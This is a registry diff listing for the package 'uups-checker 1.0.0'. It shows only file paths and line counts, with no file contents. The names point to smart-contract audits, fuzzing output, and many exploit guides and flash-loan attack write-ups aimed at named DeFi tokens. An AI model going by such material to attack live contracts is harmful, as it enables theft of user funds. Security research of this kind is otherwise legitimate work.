uups-checker 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (670) hide show
  1. package/.gitmodules +6 -0
  2. package/AIFI_AUDIT.md +220 -0
  3. package/ALL_AUDITS_SUMMARY.md +366 -0
  4. package/ALPHA_PROXY_CRITICAL_FINDING.md +136 -0
  5. package/ALPHA_PROXY_FINAL_ANALYSIS.md +213 -0
  6. package/ALPHA_PROXY_FINAL_VERDICT.md +233 -0
  7. package/ALPHA_PROXY_SELFDESTRUCT_EXPLOIT.md +161 -0
  8. package/ARIA-foundry-test.txt +9 -0
  9. package/ARIA-mythril-analysis.txt +20 -0
  10. package/ARIA-slither-analysis.txt +38 -0
  11. package/ARIA_AI_SECURITY_AUDIT.md +290 -0
  12. package/ARIA_VERIFIED_AUDIT.md +259 -0
  13. package/ARIA_VERIFIED_slither.txt +76 -0
  14. package/ARIVA_source.txt +1 -0
  15. package/ARK_AUDIT.md +349 -0
  16. package/BANANA_AUDIT.md +365 -0
  17. package/BAS_AUDIT.md +451 -0
  18. package/BAS_TOKEN_AUDIT.md +235 -0
  19. package/BCE_EXPLOIT_ANALYSIS.md +165 -0
  20. package/BEEFY_BNB_CHAIN_ANALYSIS.md +488 -0
  21. package/BEEFY_MONAD_ANALYSIS.md +239 -0
  22. package/BEEFY_STAKING_ANALYSIS.md +136 -0
  23. package/BEEFY_XVS_WBNB_ACTUAL_FINDINGS.md +223 -0
  24. package/BEEFY_XVS_WBNB_CRITICAL_FINDINGS.md +269 -0
  25. package/BLOCKSEC_ATTACK_KNOWLEDGE_BASE.md +771 -0
  26. package/BRISE_ANALYSIS.txt +31 -0
  27. package/BRISE_BSC_DAPPS.txt +68 -0
  28. package/BRISE_EXPLOITS_FOUND.md +98 -0
  29. package/BRISE_REAL_EXPLOITS.md +115 -0
  30. package/BRISE_WHITEHAT_REPORT.md +162 -0
  31. package/BRISEstake_Analysis.txt +95 -0
  32. package/BSCSLOCKTOKEN_CRITICAL_FINDING.md +240 -0
  33. package/BSW_BISWAP_SECURITY_AUDIT.md +330 -0
  34. package/BTCST_FINAL_VERDICT.md +319 -0
  35. package/BTCST_MINING_REBASE_ANALYSIS.md +229 -0
  36. package/BTCST_ROUNDING_DEEP_DIVE.md +293 -0
  37. package/BTCST_ROUNDING_FINAL_VERDICT.md +9 -0
  38. package/BTCST_SECURITY_ANALYSIS.md +391 -0
  39. package/BTR_AUDIT.md +210 -0
  40. package/BeamBridge-analysis.md +226 -0
  41. package/BeamToken-analysis.md +201 -0
  42. package/BitgertSwap_Investigation.txt +107 -0
  43. package/CEEK_STAKING_ANALYSIS.md +0 -0
  44. package/CHAINBASE_AUDIT.md +422 -0
  45. package/COMPLETE_AUDIT_SUMMARY.md +342 -0
  46. package/CORRECTED_ANALYSIS.txt +115 -0
  47. package/DBXEN_COMPARISON_SUMMARY.md +232 -0
  48. package/DBXEN_EXPLOIT_ANALYSIS.md +530 -0
  49. package/DOPFairLaunch_raw.json +29 -0
  50. package/DOPFairLaunch_source.txt +0 -0
  51. package/DOP_BRIDGE_FINAL_ANALYSIS.txt +86 -0
  52. package/DOP_BUSD_LP_ANALYSIS.txt +44 -0
  53. package/DOP_FAIRLAUNCH_ANALYSIS.txt +61 -0
  54. package/DOP_FAIRLAUNCH_FINAL_VERDICT.txt +113 -0
  55. package/DOP_STAKING_CONTRACT_ANALYSIS.txt +67 -0
  56. package/DSYNC_ECOSYSTEM_ANALYSIS.md +221 -0
  57. package/DSyncStaking-exploit-analysis.md +153 -0
  58. package/DSyncVault-analysis.md +120 -0
  59. package/DUSD_PROXY_AUDIT.md +407 -0
  60. package/DXSALE_LOCK_AUDIT.md +0 -0
  61. package/DXSaleLock_bytecode.txt +1 -0
  62. package/ECHIDNA_QUICK_START.md +101 -0
  63. package/ELEPHANT_ECOSYSTEM_AUDIT_PLAN.md +159 -0
  64. package/ELEPHANT_ECOSYSTEM_COMPREHENSIVE_AUDIT.md +427 -0
  65. package/ELEPHANT_SECURITY_ANALYSIS.md +209 -0
  66. package/ELEPHANT_VULNERABILITIES_EXPLAINED.md +455 -0
  67. package/EXPLOIT_FIX.md +300 -0
  68. package/EXPLOIT_INSTRUCTIONS.md +273 -0
  69. package/EXPLOIT_SUMMARY.md +285 -0
  70. package/EXPLOIT_SUMMARY.txt +175 -0
  71. package/FALCON_FINANCE_AUDIT.md +258 -0
  72. package/FANDOM_AUDIT.md +359 -0
  73. package/FEE_ON_TRANSFER_ANALYSIS.md +228 -0
  74. package/FINAL_AUDIT_REPORT.md +0 -0
  75. package/FOLIO_PROXY_AUDIT.md +299 -0
  76. package/FOT_EXPLOIT_RESULTS.txt +110 -0
  77. package/FOT_TOKENS_AUDITED.md +103 -0
  78. package/HEGIC-mythril-analysis.txt +39 -0
  79. package/HEGIC_COMPLETE_ANALYSIS.md +343 -0
  80. package/HOTCROSS_SWAP_EXPLOIT_ANALYSIS.md +123 -0
  81. package/ICECREAMSWAP_EXPLOITS.md +259 -0
  82. package/IMMUNEFI_REPORT.md +314 -0
  83. package/KCCPAD_EXPLOIT_GUIDE.md +285 -0
  84. package/KEL_CEL_EXPLOIT_ANALYSIS.md +0 -0
  85. package/KOGE_AUDIT.md +328 -0
  86. package/LENDFLARE_ANALYSIS.md +239 -0
  87. package/LENDFLARE_ECHIDNA_GUIDE.md +356 -0
  88. package/LENDFLARE_EXPLOIT_INSTRUCTIONS.md +297 -0
  89. package/LENDFLARE_EXPLOIT_SUMMARY.md +292 -0
  90. package/LENDFLARE_FLASHLOAN_GUIDE.md +383 -0
  91. package/LENDFLARE_FUZZING_RESULTS.md +252 -0
  92. package/LENDFLARE_HONEYPOT_BYPASS_ANALYSIS.md +420 -0
  93. package/LENDFLARE_MANUAL_FUZZING.md +324 -0
  94. package/LENDFLARE_MYTHRIL_ANALYSIS.md +339 -0
  95. package/LENDFLARE_V3_BYPASS.md +296 -0
  96. package/LFTDECOMPILE.txt +14478 -0
  97. package/LFT_ACCOUNTING_ANALYSIS.md +0 -0
  98. package/LFT_ACCOUNTING_BUG_ANALYSIS.md +426 -0
  99. package/LFT_BACKDOOR_DEEP_DIVE.md +0 -0
  100. package/LFT_CRITICAL_EXPLOIT_CONFIRMED.md +428 -0
  101. package/LFT_EXPLOIT_VISUAL.md +253 -0
  102. package/LFT_QUICK_SUMMARY.md +124 -0
  103. package/LFT_REVERSE_EXPLOIT_ANALYSIS.md +521 -0
  104. package/MGO_AUDIT_REPORT.md +420 -0
  105. package/MYTHRIL_FINAL_REPORT.md +306 -0
  106. package/MYTHRIL_SLITHER_SUMMARY.md +244 -0
  107. package/NETX_MIGRATION_AUDIT.md +0 -0
  108. package/NPM_PUBLISH_GUIDE.md +0 -0
  109. package/NRV_CRITICAL_EXPLOIT.txt +143 -0
  110. package/NetX_Analysis.txt +76 -0
  111. package/NetX_Migration_bytecode.txt +1 -0
  112. package/NetX_Migration_source.txt +0 -0
  113. package/NetX_Token_source.txt +0 -0
  114. package/NetxWhitehatRescue +22 -0
  115. package/OILER_ATTACK_VISUAL.md +351 -0
  116. package/OILER_BLOCKSEC_TEST_RESULTS.md +421 -0
  117. package/OILER_DEEP_ANALYSIS.md +212 -0
  118. package/OILER_FINAL_EXPLOIT_REPORT.md +241 -0
  119. package/OILER_FINAL_VERDICT.md +339 -0
  120. package/OILER_REENTRANCY_EXPLAINED.md +638 -0
  121. package/OILER_REENTRANCY_FINAL_SUMMARY.md +391 -0
  122. package/OILER_REENTRANCY_REALITY_CHECK.md +393 -0
  123. package/OILER_REENTRANCY_STEP_BY_STEP.md +597 -0
  124. package/OILER_STAKING_MAINNET_ANALYSIS.md +366 -0
  125. package/OILER_STAKING_SECURITY_ANALYSIS.md +409 -0
  126. package/PANCAKESWAP_UNDERFLOW_HUNTING.md +317 -0
  127. package/POLS_MULTICHAIN_AUDIT.md +0 -0
  128. package/POSI_STAKING_AUDIT.md +0 -0
  129. package/PROXY2_SECURITY_ANALYSIS.md +0 -0
  130. package/Proxy2TACS +29748 -0
  131. package/QUICK_START.md +240 -0
  132. package/RAMP_SECURITY_ANALYSIS.md +0 -0
  133. package/README.md +238 -0
  134. package/REAUDIT_MASTER_LIST.txt +15 -0
  135. package/RING_analysis.txt +212 -0
  136. package/RPC +4 -0
  137. package/RULES.txt +20 -0
  138. package/SIREN_AUDIT.md +186 -0
  139. package/SYNC_EXPLOIT_README.md +0 -0
  140. package/SYNC_TOKEN_EXPLOIT_REPORT.md +224 -0
  141. package/TLM_raw.html +0 -0
  142. package/TLM_raw.txt +0 -0
  143. package/TLM_response.json +1 -0
  144. package/TRADOOR_AUDIT.md +253 -0
  145. package/TRUNK_AUDIT.md +285 -0
  146. package/UNIBASE_AUDIT.md +241 -0
  147. package/UNLOCK_ANALYSIS.md +0 -0
  148. package/UNLOCK_EXPLOIT.md +49 -0
  149. package/UNLOCK_EXPLOIT_ANALYSIS.md +0 -0
  150. package/UPS +232 -0
  151. package/UUPSCHECKER +208 -0
  152. package/VAULT_PROXY_AUDIT.md +457 -0
  153. package/VAULT_PROXY_FINAL_VERDICT.md +0 -0
  154. package/VERIFIED_EXPLOITS_FINAL.txt +146 -0
  155. package/WKEYDAO2_AUDIT.md +245 -0
  156. package/WSG_AUDIT.md +0 -0
  157. package/XFI_DEEP_ANALYSIS.md +327 -0
  158. package/YOOSHI_EXPLOIT_GUIDE.md +119 -0
  159. package/YSDAO_EXPLOIT_GUIDE.md +0 -0
  160. package/agent-4-bundle.md +22490 -0
  161. package/alpha-proxy-echidna.txt +1 -0
  162. package/alpha-proxy-fuzz-results.txt +81 -0
  163. package/alpha-proxy-mythril.txt +2 -0
  164. package/analyze-btcst-farm.js +54 -0
  165. package/analyze-dxsale-lock.js +75 -0
  166. package/analyze-elephant.js +69 -0
  167. package/analyze-fara-rewards.js +109 -0
  168. package/analyze-fara-storage.js +83 -0
  169. package/analyze-lft-transaction.js +158 -0
  170. package/analyze-lock-bytecode.js +59 -0
  171. package/analyze-shegic.js +0 -0
  172. package/analyze-staking-abi.js +0 -0
  173. package/analyze-sxp.js +57 -0
  174. package/analyze-tlm.js +76 -0
  175. package/analyze-trumpet.js +98 -0
  176. package/analyze-unlimited-nft.js +108 -0
  177. package/analyze_elephant.sh +27 -0
  178. package/analyze_vault.sh +32 -0
  179. package/aria-bytecode.txt +1 -0
  180. package/aria_response.json +1 -0
  181. package/ark_temp/README.md +66 -0
  182. package/ark_temp/lib/forge-std/.gitattributes +1 -0
  183. package/ark_temp/lib/forge-std/.github/CODEOWNERS +1 -0
  184. package/ark_temp/lib/forge-std/.github/dependabot.yml +6 -0
  185. package/ark_temp/lib/forge-std/.github/workflows/ci.yml +125 -0
  186. package/ark_temp/lib/forge-std/.github/workflows/sync.yml +36 -0
  187. package/ark_temp/lib/forge-std/CONTRIBUTING.md +193 -0
  188. package/ark_temp/lib/forge-std/LICENSE-APACHE +203 -0
  189. package/ark_temp/lib/forge-std/LICENSE-MIT +25 -0
  190. package/ark_temp/lib/forge-std/README.md +314 -0
  191. package/ark_temp/lib/forge-std/RELEASE_CHECKLIST.md +12 -0
  192. package/ark_temp/lib/forge-std/package.json +16 -0
  193. package/ark_temp/lib/forge-std/scripts/vm.py +636 -0
  194. package/audits/AiFi-security-audit-20260326.md +499 -0
  195. package/audits/BasedAI-Brains-security-audit-20260324.md +651 -0
  196. package/audits/BinanceAlphaWallet-pashov-ai-audit-report-20260324-170000.md +362 -0
  197. package/audits/DGToken-security-audit-20260324.md +376 -0
  198. package/audits/DSyncStaking-audit-part1.md +161 -0
  199. package/audits/DSyncStaking-security-audit-20260324.md +547 -0
  200. package/audits/DecompiledERC20-security-audit-20260325.md +397 -0
  201. package/audits/DegenVC-security-audit-20260324.md +585 -0
  202. package/audits/DelreyInu-security-audit-20260324.md +463 -0
  203. package/audits/DestraNetwork-security-audit-20260324.md +705 -0
  204. package/audits/DomiToken-security-audit-20260324.md +514 -0
  205. package/audits/LendFlareToken-security-audit-20260325.md +197 -0
  206. package/audits/LockReleaseTokenPool-security-audit-20260324.md +482 -0
  207. package/audits/MOG-pashov-ai-audit-report-20260324-164900.md +229 -0
  208. package/audits/PAALAI-security-audit-20260324.md +475 -0
  209. package/audits/PAR-security-audit-20260325.md +311 -0
  210. package/audits/PepeCoinStaking-security-audit-20260324.md +358 -0
  211. package/audits/StakingPool-security-audit-20260324.md +517 -0
  212. package/audits/SyncToken-security-audit-20260324.md +778 -0
  213. package/audits/UndeadToken-decompiled-security-audit-20260324.md +485 -0
  214. package/audits/UnknownToken-decompiled-security-audit-20260324.md +647 -0
  215. package/audits/XFIStaking-security-audit-20260324.md +682 -0
  216. package/audits/Xfinance-security-audit-20260324.md +463 -0
  217. package/audits/basedAIFarm-security-audit-20260324.md +330 -0
  218. package/audits/pepeCoin-security-audit-20260324.md +462 -0
  219. package/bin/ups +232 -0
  220. package/binance-wallet-exploit/.env.example +2 -0
  221. package/binance-wallet-exploit/EXECUTIVE_SUMMARY.md +272 -0
  222. package/binance-wallet-exploit/EXPLOIT_SUMMARY.md +104 -0
  223. package/binance-wallet-exploit/FINAL_ANALYSIS.md +326 -0
  224. package/binance-wallet-exploit/FLASHLOAN_ATTACK.md +292 -0
  225. package/binance-wallet-exploit/HONEYPOT_REPORT.md +526 -0
  226. package/binance-wallet-exploit/INVESTIGATION_COMPLETE.md +362 -0
  227. package/binance-wallet-exploit/LENDFLARE_EXPLOIT.md +219 -0
  228. package/binance-wallet-exploit/LENDFLARE_FINAL_ATTACK.md +307 -0
  229. package/binance-wallet-exploit/LENDFLARE_REAL_EXPLOIT.md +286 -0
  230. package/binance-wallet-exploit/LENDFLARE_RUGPULL.md +269 -0
  231. package/binance-wallet-exploit/LFT_ANALYSIS.md +206 -0
  232. package/binance-wallet-exploit/QUICK_START.md +75 -0
  233. package/binance-wallet-exploit/README.md +195 -0
  234. package/binance-wallet-exploit/REAL_TX_EXPLOIT_ANALYSIS.md +271 -0
  235. package/binance-wallet-exploit/REMIX_INSTRUCTIONS.md +223 -0
  236. package/binance-wallet-exploit/TEST_RESULTS.md +203 -0
  237. package/binance-wallet-exploit/cache/solidity-files-cache.json +1 -0
  238. package/binance-wallet-exploit/cache/test-failures +1 -0
  239. package/binance-wallet-exploit/lib/forge-std/.gitattributes +1 -0
  240. package/binance-wallet-exploit/lib/forge-std/.github/CODEOWNERS +1 -0
  241. package/binance-wallet-exploit/lib/forge-std/.github/dependabot.yml +6 -0
  242. package/binance-wallet-exploit/lib/forge-std/.github/workflows/ci.yml +125 -0
  243. package/binance-wallet-exploit/lib/forge-std/.github/workflows/sync.yml +36 -0
  244. package/binance-wallet-exploit/lib/forge-std/CONTRIBUTING.md +193 -0
  245. package/binance-wallet-exploit/lib/forge-std/LICENSE-APACHE +203 -0
  246. package/binance-wallet-exploit/lib/forge-std/LICENSE-MIT +25 -0
  247. package/binance-wallet-exploit/lib/forge-std/README.md +314 -0
  248. package/binance-wallet-exploit/lib/forge-std/RELEASE_CHECKLIST.md +12 -0
  249. package/binance-wallet-exploit/lib/forge-std/package.json +16 -0
  250. package/binance-wallet-exploit/lib/forge-std/scripts/vm.py +636 -0
  251. package/binance-wallet-exploit/out/build-info/1e9aa7e86cf56962.json +1 -0
  252. package/binance-wallet-exploit/out/build-info/6f56f10e9d7b56eb.json +1 -0
  253. package/binance-wallet-exploit/out/build-info/7edba961ff697a24.json +1 -0
  254. package/binance-wallet-exploit/out/build-info/8c27fe3efea2f2e7.json +1 -0
  255. package/binance-wallet-exploit/out/build-info/978b680daffec63a.json +1 -0
  256. package/binance-wallet-exploit/out/build-info/9806b900b5672d0c.json +1 -0
  257. package/binance-wallet-exploit/out/build-info/b4b9ff36e9b3fc27.json +1 -0
  258. package/binance-wallet-exploit/out/build-info/b6f4df9ae05c0812.json +1 -0
  259. package/binance-wallet-exploit/out/build-info/c88dbc86551f7b5c.json +1 -0
  260. package/binance-wallet-exploit/out/build-info/e9657504010623db.json +1 -0
  261. package/cache/fuzz/failures/ARIAVerifiedFuzzTest/testFuzz_ApprovalRaceCondition +1 -0
  262. package/cache/fuzz/failures/HotCrossSwapFuzzTest/testFuzz_DirectTransferExploit +1 -0
  263. package/cache/fuzz/failures/HotCrossSwapFuzzTest/testFuzz_LargeSwapDrain +1 -0
  264. package/cache/fuzz/failures/LendFlareFuzz/testFuzz_ApprovalExploit +1 -0
  265. package/cache/fuzz/failures/LendFlareFuzz/testFuzz_BalanceManipulation +1 -0
  266. package/cache/fuzz/failures/LendFlareFuzz/testFuzz_RateManipulation +1 -0
  267. package/cache/fuzz/failures/LendFlareFuzz/testFuzz_StorageManipulation +1 -0
  268. package/cache/fuzz/failures/PARFuzzTest/testFuzz_OverflowTransfer +1 -0
  269. package/cache/fuzz/failures/PARFuzzTest/testFuzz_Transfer +1 -0
  270. package/cache/fuzz/failures/XFIDeepFuzz/testFuzz_FrontrunAddfunds +1 -0
  271. package/cache/fuzz/failures/XFIDeepFuzz/testFuzz_RewardOverflow +1 -0
  272. package/cache/fuzz/failures/XFIDeepFuzz/testFuzz_RoundingExploit +1 -0
  273. package/cache/fuzz/failures/XFIDeepFuzz/testFuzz_WithdrawLimit +1 -0
  274. package/cache/solidity-files-cache.json +1 -0
  275. package/cache/test-failures +1 -0
  276. package/calculate-elephant-flashloan.js +195 -0
  277. package/check-address-approval.js +112 -0
  278. package/check-alpha-proxy.js +42 -0
  279. package/check-arbitrage.js +155 -0
  280. package/check-aria-token.js +47 -0
  281. package/check-ark.sh +20 -0
  282. package/check-btcst-mining.js +75 -0
  283. package/check-btcst-pools.js +163 -0
  284. package/check-btcst.js +88 -0
  285. package/check-caller.js +26 -0
  286. package/check-ceek-lp.js +73 -0
  287. package/check-ceek.js +47 -0
  288. package/check-dxsale-address.js +35 -0
  289. package/check-fara-exploit-timing.js +56 -0
  290. package/check-fara-real-exploit.js +73 -0
  291. package/check-flashloan-limits.js +129 -0
  292. package/check-kel-cel-pool.js +91 -0
  293. package/check-lax-staking.js +41 -0
  294. package/check-lendflare.js +165 -0
  295. package/check-lft-accounting.js +109 -0
  296. package/check-lft-roles.js +165 -0
  297. package/check-lock-time.js +47 -0
  298. package/check-min-stake.js +73 -0
  299. package/check-mystery-contract.js +52 -0
  300. package/check-next-token.js +50 -0
  301. package/check-nora-lock.js +67 -0
  302. package/check-oiler-approvals.js +116 -0
  303. package/check-oiler-proxy.js +73 -0
  304. package/check-oiler-staking.js +117 -0
  305. package/check-proxy-simple.js +71 -0
  306. package/check-recent-stakes.js +54 -0
  307. package/check-shegic-holdings.js +67 -0
  308. package/check-snowcrash-ecosystem.js +83 -0
  309. package/check-sync-lp.js +97 -0
  310. package/check-sync-stake.js +42 -0
  311. package/check-tlm.js +37 -0
  312. package/check-token-pools.js +146 -0
  313. package/check-trunk-depeg.js +181 -0
  314. package/check-tusd-decimals.js +58 -0
  315. package/check-user-storage-deep.js +81 -0
  316. package/check-welephant-pools.js +130 -0
  317. package/check-xfi-pool.js +75 -0
  318. package/check-zypher.js +32 -0
  319. package/check_proxy.sh +36 -0
  320. package/compare-tlm-chains.js +90 -0
  321. package/contract_0x05f2.html +6025 -0
  322. package/contract_0x3720.html +6361 -0
  323. package/contract_0x928e.html +5606 -0
  324. package/contract_0xc42d.html +5304 -0
  325. package/contract_page.html +5789 -0
  326. package/decode-stake-tx.js +50 -0
  327. package/deep-analyze-lock.js +82 -0
  328. package/dune_uups_proxy_query.sql +42 -0
  329. package/dune_uups_vulnerable_query.sql +0 -0
  330. package/echidna/alpha-proxy.yaml +14 -0
  331. package/echidna/elephant.yaml +7 -0
  332. package/echidna/lendflare.yaml +42 -0
  333. package/echidna.config.yaml +12 -0
  334. package/elephant_raw.json +1 -0
  335. package/eps_raw.json +1 -0
  336. package/exploit/.github/workflows/test.yml +38 -0
  337. package/exploit/.gitmodules +3 -0
  338. package/exploit/README.md +66 -0
  339. package/exploit/foundry.lock +8 -0
  340. package/exploit/lib/forge-std/.gitattributes +1 -0
  341. package/exploit/lib/forge-std/.github/CODEOWNERS +1 -0
  342. package/exploit/lib/forge-std/.github/dependabot.yml +6 -0
  343. package/exploit/lib/forge-std/.github/workflows/ci.yml +125 -0
  344. package/exploit/lib/forge-std/.github/workflows/sync.yml +36 -0
  345. package/exploit/lib/forge-std/CONTRIBUTING.md +193 -0
  346. package/exploit/lib/forge-std/LICENSE-APACHE +203 -0
  347. package/exploit/lib/forge-std/LICENSE-MIT +25 -0
  348. package/exploit/lib/forge-std/README.md +314 -0
  349. package/exploit/lib/forge-std/RELEASE_CHECKLIST.md +12 -0
  350. package/exploit/lib/forge-std/package.json +16 -0
  351. package/exploit/lib/forge-std/scripts/vm.py +636 -0
  352. package/exploit_analysis.txt +51 -0
  353. package/extract_contract.py +21 -0
  354. package/extract_elephant_contracts.py +24 -0
  355. package/fara-staking-bytecode.txt +1 -0
  356. package/fara-staking-raw.txt +1 -0
  357. package/fetch-aria.js +46 -0
  358. package/fetch-contract.js +50 -0
  359. package/fetch-shegic-source.js +86 -0
  360. package/fetch-snowcrash.js +44 -0
  361. package/fetch-staking-source.js +53 -0
  362. package/fetch-tlm.js +60 -0
  363. package/fetch_elephant_source.py +32 -0
  364. package/find-ceek-staking.js +21 -0
  365. package/find-exploit-tx.js +88 -0
  366. package/find-oiler-holders.js +100 -0
  367. package/find-tlm-holder.js +36 -0
  368. package/find-vulnerable-fund.js +94 -0
  369. package/foundry.lock +8 -0
  370. package/fuzz-all.sh +53 -0
  371. package/get-aria-contract.py +40 -0
  372. package/get-lft-holders.js +89 -0
  373. package/get-tlm-source.sh +8 -0
  374. package/harvest_txs.json +1 -0
  375. package/lft-bytecode-raw.txt +1 -0
  376. package/lft-bytecode.json +1 -0
  377. package/lft-impl.bin +1 -0
  378. package/lft-implementation-bytecode.txt +1 -0
  379. package/lib/forge-std/.gitattributes +1 -0
  380. package/lib/forge-std/.github/CODEOWNERS +1 -0
  381. package/lib/forge-std/.github/dependabot.yml +6 -0
  382. package/lib/forge-std/.github/workflows/ci.yml +125 -0
  383. package/lib/forge-std/.github/workflows/sync.yml +36 -0
  384. package/lib/forge-std/CONTRIBUTING.md +193 -0
  385. package/lib/forge-std/LICENSE-APACHE +203 -0
  386. package/lib/forge-std/LICENSE-MIT +25 -0
  387. package/lib/forge-std/README.md +314 -0
  388. package/lib/forge-std/RELEASE_CHECKLIST.md +12 -0
  389. package/lib/forge-std/package.json +16 -0
  390. package/lib/forge-std/scripts/vm.py +636 -0
  391. package/lib/openzeppelin-contracts/.changeset/config.json +12 -0
  392. package/lib/openzeppelin-contracts/.codecov.yml +12 -0
  393. package/lib/openzeppelin-contracts/.editorconfig +21 -0
  394. package/lib/openzeppelin-contracts/.eslintrc +20 -0
  395. package/lib/openzeppelin-contracts/.github/ISSUE_TEMPLATE/bug_report.md +21 -0
  396. package/lib/openzeppelin-contracts/.github/ISSUE_TEMPLATE/config.yml +4 -0
  397. package/lib/openzeppelin-contracts/.github/ISSUE_TEMPLATE/feature_request.md +14 -0
  398. package/lib/openzeppelin-contracts/.github/PULL_REQUEST_TEMPLATE.md +20 -0
  399. package/lib/openzeppelin-contracts/.github/actions/gas-compare/action.yml +49 -0
  400. package/lib/openzeppelin-contracts/.github/actions/setup/action.yml +21 -0
  401. package/lib/openzeppelin-contracts/.github/actions/storage-layout/action.yml +55 -0
  402. package/lib/openzeppelin-contracts/.github/workflows/actionlint.yml +18 -0
  403. package/lib/openzeppelin-contracts/.github/workflows/changeset.yml +28 -0
  404. package/lib/openzeppelin-contracts/.github/workflows/checks.yml +118 -0
  405. package/lib/openzeppelin-contracts/.github/workflows/docs.yml +19 -0
  406. package/lib/openzeppelin-contracts/.github/workflows/formal-verification.yml +68 -0
  407. package/lib/openzeppelin-contracts/.github/workflows/release-cycle.yml +214 -0
  408. package/lib/openzeppelin-contracts/.github/workflows/upgradeable.yml +34 -0
  409. package/lib/openzeppelin-contracts/.gitmodules +7 -0
  410. package/lib/openzeppelin-contracts/.mocharc.js +4 -0
  411. package/lib/openzeppelin-contracts/.prettierrc +15 -0
  412. package/lib/openzeppelin-contracts/.solcover.js +13 -0
  413. package/lib/openzeppelin-contracts/CHANGELOG.md +972 -0
  414. package/lib/openzeppelin-contracts/CODE_OF_CONDUCT.md +73 -0
  415. package/lib/openzeppelin-contracts/CONTRIBUTING.md +36 -0
  416. package/lib/openzeppelin-contracts/GUIDELINES.md +148 -0
  417. package/lib/openzeppelin-contracts/LICENSE +22 -0
  418. package/lib/openzeppelin-contracts/README.md +107 -0
  419. package/lib/openzeppelin-contracts/RELEASING.md +45 -0
  420. package/lib/openzeppelin-contracts/SECURITY.md +42 -0
  421. package/lib/openzeppelin-contracts/audits/2017-03.md +292 -0
  422. package/lib/openzeppelin-contracts/audits/2018-10.pdf +0 -0
  423. package/lib/openzeppelin-contracts/audits/2022-10-Checkpoints.pdf +0 -0
  424. package/lib/openzeppelin-contracts/audits/2022-10-ERC4626.pdf +0 -0
  425. package/lib/openzeppelin-contracts/audits/2023-05-v4.9.pdf +0 -0
  426. package/lib/openzeppelin-contracts/audits/2023-10-v5.0.pdf +0 -0
  427. package/lib/openzeppelin-contracts/audits/README.md +17 -0
  428. package/lib/openzeppelin-contracts/certora/Makefile +54 -0
  429. package/lib/openzeppelin-contracts/certora/README.md +60 -0
  430. package/lib/openzeppelin-contracts/certora/diff/access_manager_AccessManager.sol.patch +97 -0
  431. package/lib/openzeppelin-contracts/certora/reports/2021-10.pdf +0 -0
  432. package/lib/openzeppelin-contracts/certora/reports/2022-03.pdf +0 -0
  433. package/lib/openzeppelin-contracts/certora/reports/2022-05.pdf +0 -0
  434. package/lib/openzeppelin-contracts/certora/run.js +160 -0
  435. package/lib/openzeppelin-contracts/certora/specs/AccessControl.spec +119 -0
  436. package/lib/openzeppelin-contracts/certora/specs/AccessControlDefaultAdminRules.spec +464 -0
  437. package/lib/openzeppelin-contracts/certora/specs/DoubleEndedQueue.spec +300 -0
  438. package/lib/openzeppelin-contracts/certora/specs/ERC20.spec +352 -0
  439. package/lib/openzeppelin-contracts/certora/specs/ERC20FlashMint.spec +55 -0
  440. package/lib/openzeppelin-contracts/certora/specs/ERC20Wrapper.spec +198 -0
  441. package/lib/openzeppelin-contracts/certora/specs/ERC721.spec +679 -0
  442. package/lib/openzeppelin-contracts/certora/specs/EnumerableMap.spec +333 -0
  443. package/lib/openzeppelin-contracts/certora/specs/EnumerableSet.spec +246 -0
  444. package/lib/openzeppelin-contracts/certora/specs/Initializable.spec +165 -0
  445. package/lib/openzeppelin-contracts/certora/specs/Ownable.spec +77 -0
  446. package/lib/openzeppelin-contracts/certora/specs/Ownable2Step.spec +108 -0
  447. package/lib/openzeppelin-contracts/certora/specs/Pausable.spec +96 -0
  448. package/lib/openzeppelin-contracts/certora/specs/TimelockController.spec +274 -0
  449. package/lib/openzeppelin-contracts/certora/specs/helpers/helpers.spec +7 -0
  450. package/lib/openzeppelin-contracts/certora/specs/methods/IAccessControl.spec +8 -0
  451. package/lib/openzeppelin-contracts/certora/specs/methods/IAccessControlDefaultAdminRules.spec +36 -0
  452. package/lib/openzeppelin-contracts/certora/specs/methods/IERC20.spec +11 -0
  453. package/lib/openzeppelin-contracts/certora/specs/methods/IERC2612.spec +5 -0
  454. package/lib/openzeppelin-contracts/certora/specs/methods/IERC3156FlashBorrower.spec +3 -0
  455. package/lib/openzeppelin-contracts/certora/specs/methods/IERC3156FlashLender.spec +5 -0
  456. package/lib/openzeppelin-contracts/certora/specs/methods/IERC5313.spec +3 -0
  457. package/lib/openzeppelin-contracts/certora/specs/methods/IERC721.spec +17 -0
  458. package/lib/openzeppelin-contracts/certora/specs/methods/IERC721Receiver.spec +3 -0
  459. package/lib/openzeppelin-contracts/certora/specs/methods/IOwnable.spec +5 -0
  460. package/lib/openzeppelin-contracts/certora/specs/methods/IOwnable2Step.spec +7 -0
  461. package/lib/openzeppelin-contracts/certora/specs.json +86 -0
  462. package/lib/openzeppelin-contracts/contracts/access/README.adoc +43 -0
  463. package/lib/openzeppelin-contracts/contracts/finance/README.adoc +14 -0
  464. package/lib/openzeppelin-contracts/contracts/governance/README.adoc +167 -0
  465. package/lib/openzeppelin-contracts/contracts/interfaces/README.adoc +82 -0
  466. package/lib/openzeppelin-contracts/contracts/metatx/README.adoc +12 -0
  467. package/lib/openzeppelin-contracts/contracts/package.json +32 -0
  468. package/lib/openzeppelin-contracts/contracts/proxy/README.adoc +87 -0
  469. package/lib/openzeppelin-contracts/contracts/token/ERC1155/README.adoc +41 -0
  470. package/lib/openzeppelin-contracts/contracts/token/ERC20/README.adoc +67 -0
  471. package/lib/openzeppelin-contracts/contracts/token/ERC721/README.adoc +67 -0
  472. package/lib/openzeppelin-contracts/contracts/token/common/README.adoc +10 -0
  473. package/lib/openzeppelin-contracts/contracts/utils/README.adoc +88 -0
  474. package/lib/openzeppelin-contracts/contracts/vendor/compound/LICENSE +11 -0
  475. package/lib/openzeppelin-contracts/docs/README.md +16 -0
  476. package/lib/openzeppelin-contracts/docs/antora.yml +7 -0
  477. package/lib/openzeppelin-contracts/docs/config.js +21 -0
  478. package/lib/openzeppelin-contracts/docs/modules/ROOT/images/erc4626-attack-3a.png +0 -0
  479. package/lib/openzeppelin-contracts/docs/modules/ROOT/images/erc4626-attack-3b.png +0 -0
  480. package/lib/openzeppelin-contracts/docs/modules/ROOT/images/erc4626-attack-6.png +0 -0
  481. package/lib/openzeppelin-contracts/docs/modules/ROOT/images/erc4626-attack.png +0 -0
  482. package/lib/openzeppelin-contracts/docs/modules/ROOT/images/erc4626-deposit.png +0 -0
